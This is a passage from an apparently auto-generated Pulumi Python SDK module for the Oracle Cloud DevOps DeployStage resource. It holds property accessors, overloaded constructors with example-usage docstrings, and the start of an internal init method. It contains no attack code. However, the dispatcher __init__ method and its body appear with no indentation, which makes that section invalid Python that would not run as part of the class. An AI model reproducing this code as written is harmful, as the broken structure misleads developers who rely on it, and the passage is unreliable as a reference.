    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> Optional[pulumi.Input[str]]:
        """The OCID of a compartment."""
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, compartment_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "compartment_id", compartment_id)

    @property
    @pulumi.getter(name="computeInstanceGroupDeployEnvironmentId")
    def compute_instance_group_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) A compute instance group environment OCID for rolling deployment."""
        return pulumi.get(self, "compute_instance_group_deploy_environment_id")

    @compute_instance_group_deploy_environment_id.setter
    def compute_instance_group_deploy_environment_id(self, compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "compute_instance_group_deploy_environment_id", compute_instance_group_deploy_environment_id)

    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """(Updatable) User-provided key/value configuration, assigned through constants or parameters."""
        return pulumi.get(self, "config")

    @config.setter
    def config(self, config: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "config", config)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Defined tags for this resource; each key is predefined and scoped to a
        namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
        Example: `{"foo-namespace.bar-key": "value"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, defined_tags: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", defined_tags)

    @property
    @pulumi.getter(name="deployArtifactId")
    def deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Optional binary artifact OCID the user may provide to this stage."""
        return pulumi.get(self, "deploy_artifact_id")

    @deploy_artifact_id.setter
    def deploy_artifact_id(self, deploy_artifact_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deploy_artifact_id", deploy_artifact_id)

    @property
    @pulumi.getter(name="deployArtifactIds")
    def deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """(Updatable) Additional file artifact OCIDs."""
        return pulumi.get(self, "deploy_artifact_ids")

    @deploy_artifact_ids.setter
    def deploy_artifact_ids(self, deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "deploy_artifact_ids", deploy_artifact_ids)

    @property
    @pulumi.getter(name="deployPipelineId")
    def deploy_pipeline_id(self) -> Optional[pulumi.Input[str]]:
        """The OCID of a pipeline."""
        return pulumi.get(self, "deploy_pipeline_id")

    @deploy_pipeline_id.setter
    def deploy_pipeline_id(self, deploy_pipeline_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deploy_pipeline_id", deploy_pipeline_id)

    @property
    @pulumi.getter(name="deployStagePredecessorCollection")
    def deploy_stage_predecessor_collection(self) -> Optional[pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']]:
        """(Updatable) Collection containing the predecessors of a stage."""
        return pulumi.get(self, "deploy_stage_predecessor_collection")

    @deploy_stage_predecessor_collection.setter
    def deploy_stage_predecessor_collection(self, deploy_stage_predecessor_collection: Optional[pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']]):
        pulumi.set(self, "deploy_stage_predecessor_collection", deploy_stage_predecessor_collection)

    @property
    @pulumi.getter(name="deployStageType")
    def deploy_stage_type(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Deployment stage type."""
        return pulumi.get(self, "deploy_stage_type")

    @deploy_stage_type.setter
    def deploy_stage_type(self, deploy_stage_type: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deploy_stage_type", deploy_stage_type)

    @property
    @pulumi.getter(name="deploymentSpecDeployArtifactId")
    def deployment_spec_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) OCID of the artifact that contains the deployment specification."""
        return pulumi.get(self, "deployment_spec_deploy_artifact_id")

    @deployment_spec_deploy_artifact_id.setter
    def deployment_spec_deploy_artifact_id(self, deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deployment_spec_deploy_artifact_id", deployment_spec_deploy_artifact_id)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Optional description of the deployment stage."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, description: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", description)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Stage display name; renamable, not necessarily unique. Avoid confidential information."""
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, display_name: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", display_name)

    @property
    @pulumi.getter(name="dockerImageDeployArtifactId")
    def docker_image_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) A Docker image artifact OCID."""
        return pulumi.get(self, "docker_image_deploy_artifact_id")

    @docker_image_deploy_artifact_id.setter
    def docker_image_deploy_artifact_id(self, docker_image_deploy_artifact_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "docker_image_deploy_artifact_id", docker_image_deploy_artifact_id)

    @property
    @pulumi.getter(name="failurePolicy")
    def failure_policy(self) -> Optional[pulumi.Input['DeployStageFailurePolicyArgs']]:
        """(Updatable) Failure policy for a compute instance group rolling deployment stage."""
        return pulumi.get(self, "failure_policy")

    @failure_policy.setter
    def failure_policy(self, failure_policy: Optional[pulumi.Input['DeployStageFailurePolicyArgs']]):
        pulumi.set(self, "failure_policy", failure_policy)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Simple key-value pairs applied without predefined name, type, or scope;
        exists for cross-compatibility only. See
        [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
        Example: `{"bar-key": "value"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", freeform_tags)

    @property
    @pulumi.getter(name="functionDeployEnvironmentId")
    def function_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Function environment OCID."""
        return pulumi.get(self, "function_deploy_environment_id")

    @function_deploy_environment_id.setter
    def function_deploy_environment_id(self, function_deploy_environment_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "function_deploy_environment_id", function_deploy_environment_id)

    @property
    @pulumi.getter(name="functionTimeoutInSeconds")
    def function_timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
        """(Updatable) Timeout for Function execution, in seconds."""
        return pulumi.get(self, "function_timeout_in_seconds")

    @function_timeout_in_seconds.setter
    def function_timeout_in_seconds(self, function_timeout_in_seconds: Optional[pulumi.Input[int]]):
        pulumi.set(self, "function_timeout_in_seconds", function_timeout_in_seconds)

    @property
    @pulumi.getter(name="greenBackendIps")
    def green_backend_ips(self) -> Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]:
        """(Updatable) Collection of backend environment IP addresses."""
        return pulumi.get(self, "green_backend_ips")

    @green_backend_ips.setter
    def green_backend_ips(self, green_backend_ips: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]):
        pulumi.set(self, "green_backend_ips", green_backend_ips)

    @property
    @pulumi.getter(name="isAsync")
    def is_async(self) -> Optional[pulumi.Input[bool]]:
        """(Updatable) Whether this stage executes asynchronously."""
        return pulumi.get(self, "is_async")

    @is_async.setter
    def is_async(self, is_async: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_async", is_async)

    @property
    @pulumi.getter(name="isValidationEnabled")
    def is_validation_enabled(self) -> Optional[pulumi.Input[bool]]:
        """(Updatable) Whether the invoked function should be validated."""
        return pulumi.get(self, "is_validation_enabled")

    @is_validation_enabled.setter
    def is_validation_enabled(self, is_validation_enabled: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_validation_enabled", is_validation_enabled)

    @property
    @pulumi.getter(name="kubernetesManifestDeployArtifactIds")
    def kubernetes_manifest_deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """(Updatable) Kubernetes manifest artifact OCIDs; the manifests should not include any job resource."""
        return pulumi.get(self, "kubernetes_manifest_deploy_artifact_ids")

    @kubernetes_manifest_deploy_artifact_ids.setter
    def kubernetes_manifest_deploy_artifact_ids(self, kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "kubernetes_manifest_deploy_artifact_ids", kubernetes_manifest_deploy_artifact_ids)

    @property
    @pulumi.getter(name="lifecycleDetails")
    def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
        """A message describing the current state in more detail, e.g. actionable information for a resource in Failed state."""
        return pulumi.get(self, "lifecycle_details")

    @lifecycle_details.setter
    def lifecycle_details(self, lifecycle_details: Optional[pulumi.Input[str]]):
        pulumi.set(self, "lifecycle_details", lifecycle_details)

    @property
    @pulumi.getter(name="loadBalancerConfig")
    def load_balancer_config(self) -> Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]:
        """(Updatable) Config for load balancer traffic shift stages."""
        return pulumi.get(self, "load_balancer_config")

    @load_balancer_config.setter
    def load_balancer_config(self, load_balancer_config: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]):
        pulumi.set(self, "load_balancer_config", load_balancer_config)

    @property
    @pulumi.getter(name="maxMemoryInMbs")
    def max_memory_in_mbs(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Maximum usable memory for the Function, in MB."""
        return pulumi.get(self, "max_memory_in_mbs")

    @max_memory_in_mbs.setter
    def max_memory_in_mbs(self, max_memory_in_mbs: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_memory_in_mbs", max_memory_in_mbs)

    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Default namespace for Kubernetes deployment when the manifest does not specify one."""
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, namespace: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", namespace)

    @property
    @pulumi.getter(name="okeClusterDeployEnvironmentId")
    def oke_cluster_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Kubernetes cluster environment OCID for deployment."""
        return pulumi.get(self, "oke_cluster_deploy_environment_id")

    @oke_cluster_deploy_environment_id.setter
    def oke_cluster_deploy_environment_id(self, oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "oke_cluster_deploy_environment_id", oke_cluster_deploy_environment_id)

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> Optional[pulumi.Input[str]]:
        """The OCID of a project."""
        return pulumi.get(self, "project_id")

    @project_id.setter
    def project_id(self, project_id: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_id", project_id)

    @property
    @pulumi.getter(name="rollbackPolicy")
    def rollback_policy(self) -> Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]:
        """(Updatable) Rollback policy; initiated on failure of certain stage types."""
        return pulumi.get(self, "rollback_policy")

    @rollback_policy.setter
    def rollback_policy(self, rollback_policy: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]):
        pulumi.set(self, "rollback_policy", rollback_policy)

    @property
    @pulumi.getter(name="rolloutPolicy")
    def rollout_policy(self) -> Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]:
        """(Updatable) Rollout policy for a load balancer traffic shift stage."""
        return pulumi.get(self, "rollout_policy")

    @rollout_policy.setter
    def rollout_policy(self, rollout_policy: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]):
        pulumi.set(self, "rollout_policy", rollout_policy)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """The current state of the deployment stage."""
        return pulumi.get(self, "state")

    @state.setter
    def state(self, state: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", state)

    @property
    @pulumi.getter(name="systemTags")
    def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Usage of system tag keys; these predefined keys are scoped to namespaces. See
        [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
        Example: `{"orcl-cloud.free-tier-retained": "true"}`
        """
        return pulumi.get(self, "system_tags")

    @system_tags.setter
    def system_tags(self, system_tags: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "system_tags", system_tags)

    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> Optional[pulumi.Input[str]]:
        """Time the deployment stage was created, in [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339) format."""
        return pulumi.get(self, "time_created")

    @time_created.setter
    def time_created(self, time_created: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_created", time_created)

    @property
    @pulumi.getter(name="timeUpdated")
    def time_updated(self) -> Optional[pulumi.Input[str]]:
        """Time the deployment stage was updated, in [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339) format."""
        return pulumi.get(self, "time_updated")

    @time_updated.setter
    def time_updated(self, time_updated: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_updated", time_updated)

    @property
    @pulumi.getter(name="trafficShiftTarget")
    def traffic_shift_target(self) -> Optional[pulumi.Input[str]]:
        """(Updatable) Target or destination backend set."""
        return pulumi.get(self, "traffic_shift_target")

    @traffic_shift_target.setter
    def traffic_shift_target(self, traffic_shift_target: Optional[pulumi.Input[str]]):
        pulumi.set(self, "traffic_shift_target", traffic_shift_target)

    @property
    @pulumi.getter(name="waitCriteria")
    def wait_criteria(self) -> Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]:
        """(Updatable) Wait criteria for the Wait stage."""
        return pulumi.get(self, "wait_criteria")

    @wait_criteria.setter
    def wait_criteria(self, wait_criteria: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]):
        pulumi.set(self, "wait_criteria", wait_criteria)
class DeployStage(pulumi.CustomResource):
    # Overload 1 of 2: construct the resource from individual keyword arguments.
    # Typing-only; the real work is performed by _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 approval_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']]] = None,
                 blue_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']]] = None,
                 compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                 config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                 deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
                 deploy_stage_predecessor_collection: Optional[pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']]] = None,
                 deploy_stage_type: Optional[pulumi.Input[str]] = None,
                 deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                 failure_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                 function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
                 green_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']]] = None,
                 is_async: Optional[pulumi.Input[bool]] = None,
                 is_validation_enabled: Optional[pulumi.Input[bool]] = None,
                 kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 load_balancer_config: Optional[pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']]] = None,
                 max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                 rollback_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']]] = None,
                 rollout_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']]] = None,
                 traffic_shift_target: Optional[pulumi.Input[str]] = None,
                 wait_criteria: Optional[pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']]] = None,
                 __props__=None):
        """
        This resource provides the Deploy Stage resource in Oracle Cloud Infrastructure Devops service.

        Creates a new deployment stage.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_oci as oci

        test_deploy_stage = oci.devops.DeployStage("testDeployStage",
            deploy_pipeline_id=oci_devops_deploy_pipeline["test_deploy_pipeline"]["id"],
            deploy_stage_predecessor_collection=oci.devops.DeployStageDeployStagePredecessorCollectionArgs(
                items=[oci.devops.DeployStageDeployStagePredecessorCollectionItemArgs(
                    id=var["deploy_stage_deploy_stage_predecessor_collection_items_id"],
                )],
            ),
            deploy_stage_type=var["deploy_stage_deploy_stage_type"],
            approval_policy=oci.devops.DeployStageApprovalPolicyArgs(
                approval_policy_type=var["deploy_stage_approval_policy_approval_policy_type"],
                number_of_approvals_required=var["deploy_stage_approval_policy_number_of_approvals_required"],
            ),
            blue_backend_ips=oci.devops.DeployStageBlueBackendIpsArgs(
                items=var["deploy_stage_blue_backend_ips_items"],
            ),
            compute_instance_group_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
            config=var["deploy_stage_config"],
            defined_tags={
                "foo-namespace.bar-key": "value",
            },
            deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
            deploy_artifact_ids=var["deploy_stage_deploy_artifact_ids"],
            deployment_spec_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
            description=var["deploy_stage_description"],
            display_name=var["deploy_stage_display_name"],
            docker_image_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
            failure_policy=oci.devops.DeployStageFailurePolicyArgs(
                policy_type=var["deploy_stage_failure_policy_policy_type"],
                failure_count=var["deploy_stage_failure_policy_failure_count"],
                failure_percentage=var["deploy_stage_failure_policy_failure_percentage"],
            ),
            freeform_tags={
                "bar-key": "value",
            },
            function_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
            function_timeout_in_seconds=var["deploy_stage_function_timeout_in_seconds"],
            green_backend_ips=oci.devops.DeployStageGreenBackendIpsArgs(
                items=var["deploy_stage_green_backend_ips_items"],
            ),
            is_async=var["deploy_stage_is_async"],
            is_validation_enabled=var["deploy_stage_is_validation_enabled"],
            kubernetes_manifest_deploy_artifact_ids=var["deploy_stage_kubernetes_manifest_deploy_artifact_ids"],
            load_balancer_config=oci.devops.DeployStageLoadBalancerConfigArgs(
                backend_port=var["deploy_stage_load_balancer_config_backend_port"],
                listener_name=oci_load_balancer_listener["test_listener"]["name"],
                load_balancer_id=oci_load_balancer_load_balancer["test_load_balancer"]["id"],
            ),
            max_memory_in_mbs=var["deploy_stage_max_memory_in_mbs"],
            namespace=var["deploy_stage_namespace"],
            oke_cluster_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
            rollback_policy=oci.devops.DeployStageRollbackPolicyArgs(
                policy_type=var["deploy_stage_rollback_policy_policy_type"],
            ),
            rollout_policy=oci.devops.DeployStageRolloutPolicyArgs(
                policy_type=var["deploy_stage_rollout_policy_policy_type"],
                batch_count=var["deploy_stage_rollout_policy_batch_count"],
                batch_delay_in_seconds=var["deploy_stage_rollout_policy_batch_delay_in_seconds"],
                batch_percentage=var["deploy_stage_rollout_policy_batch_percentage"],
                ramp_limit_percent=var["deploy_stage_rollout_policy_ramp_limit_percent"],
            ),
            traffic_shift_target=var["deploy_stage_traffic_shift_target"],
            wait_criteria=oci.devops.DeployStageWaitCriteriaArgs(
                wait_duration=var["deploy_stage_wait_criteria_wait_duration"],
                wait_type=var["deploy_stage_wait_criteria_wait_type"],
            ))
        ```

        ## Import

        DeployStages can be imported using the `id`, e.g.

        ```sh
         $ pulumi import oci:devops/deployStage:DeployStage test_deploy_stage "id"
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']] approval_policy: (Updatable) Specifies the approval policy.
        :param pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
        :param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
        :param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
        :param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
        :param pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
        :param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
        :param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
        :param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
        :param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
        :param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
        :param pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
        :param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
        :param pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
        :param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
        :param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
        :param pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
        :param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
        :param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
        :param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
        :param pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
        :param pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
        :param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
        :param pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
        """
        ...
    # Overload 2 of 2: construct the resource from a single DeployStageArgs
    # object. Typing-only; the real work is performed by _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: DeployStageArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        This resource provides the Deploy Stage resource in Oracle Cloud Infrastructure Devops service.

        Creates a new deployment stage.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_oci as oci

        test_deploy_stage = oci.devops.DeployStage("testDeployStage",
            deploy_pipeline_id=oci_devops_deploy_pipeline["test_deploy_pipeline"]["id"],
            deploy_stage_predecessor_collection=oci.devops.DeployStageDeployStagePredecessorCollectionArgs(
                items=[oci.devops.DeployStageDeployStagePredecessorCollectionItemArgs(
                    id=var["deploy_stage_deploy_stage_predecessor_collection_items_id"],
                )],
            ),
            deploy_stage_type=var["deploy_stage_deploy_stage_type"],
            approval_policy=oci.devops.DeployStageApprovalPolicyArgs(
                approval_policy_type=var["deploy_stage_approval_policy_approval_policy_type"],
                number_of_approvals_required=var["deploy_stage_approval_policy_number_of_approvals_required"],
            ),
            blue_backend_ips=oci.devops.DeployStageBlueBackendIpsArgs(
                items=var["deploy_stage_blue_backend_ips_items"],
            ),
            compute_instance_group_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
            config=var["deploy_stage_config"],
            defined_tags={
                "foo-namespace.bar-key": "value",
            },
            deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
            deploy_artifact_ids=var["deploy_stage_deploy_artifact_ids"],
            deployment_spec_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
            description=var["deploy_stage_description"],
            display_name=var["deploy_stage_display_name"],
            docker_image_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
            failure_policy=oci.devops.DeployStageFailurePolicyArgs(
                policy_type=var["deploy_stage_failure_policy_policy_type"],
                failure_count=var["deploy_stage_failure_policy_failure_count"],
                failure_percentage=var["deploy_stage_failure_policy_failure_percentage"],
            ),
            freeform_tags={
                "bar-key": "value",
            },
            function_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
            function_timeout_in_seconds=var["deploy_stage_function_timeout_in_seconds"],
            green_backend_ips=oci.devops.DeployStageGreenBackendIpsArgs(
                items=var["deploy_stage_green_backend_ips_items"],
            ),
            is_async=var["deploy_stage_is_async"],
            is_validation_enabled=var["deploy_stage_is_validation_enabled"],
            kubernetes_manifest_deploy_artifact_ids=var["deploy_stage_kubernetes_manifest_deploy_artifact_ids"],
            load_balancer_config=oci.devops.DeployStageLoadBalancerConfigArgs(
                backend_port=var["deploy_stage_load_balancer_config_backend_port"],
                listener_name=oci_load_balancer_listener["test_listener"]["name"],
                load_balancer_id=oci_load_balancer_load_balancer["test_load_balancer"]["id"],
            ),
            max_memory_in_mbs=var["deploy_stage_max_memory_in_mbs"],
            namespace=var["deploy_stage_namespace"],
            oke_cluster_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
            rollback_policy=oci.devops.DeployStageRollbackPolicyArgs(
                policy_type=var["deploy_stage_rollback_policy_policy_type"],
            ),
            rollout_policy=oci.devops.DeployStageRolloutPolicyArgs(
                policy_type=var["deploy_stage_rollout_policy_policy_type"],
                batch_count=var["deploy_stage_rollout_policy_batch_count"],
                batch_delay_in_seconds=var["deploy_stage_rollout_policy_batch_delay_in_seconds"],
                batch_percentage=var["deploy_stage_rollout_policy_batch_percentage"],
                ramp_limit_percent=var["deploy_stage_rollout_policy_ramp_limit_percent"],
            ),
            traffic_shift_target=var["deploy_stage_traffic_shift_target"],
            wait_criteria=oci.devops.DeployStageWaitCriteriaArgs(
                wait_duration=var["deploy_stage_wait_criteria_wait_duration"],
                wait_type=var["deploy_stage_wait_criteria_wait_type"],
            ))
        ```

        ## Import

        DeployStages can be imported using the `id`, e.g.

        ```sh
         $ pulumi import oci:devops/deployStage:DeployStage test_deploy_stage "id"
        ```

        :param str resource_name: The name of the resource.
        :param DeployStageArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeployStageArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    # Shared implementation behind both __init__ overloads: validates options,
    # collects properties, and registers the resource with the Pulumi engine.
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       approval_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']]] = None,
                       blue_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']]] = None,
                       compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                       config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                       defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                       deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                       deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
                       deploy_stage_predecessor_collection: Optional[pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']]] = None,
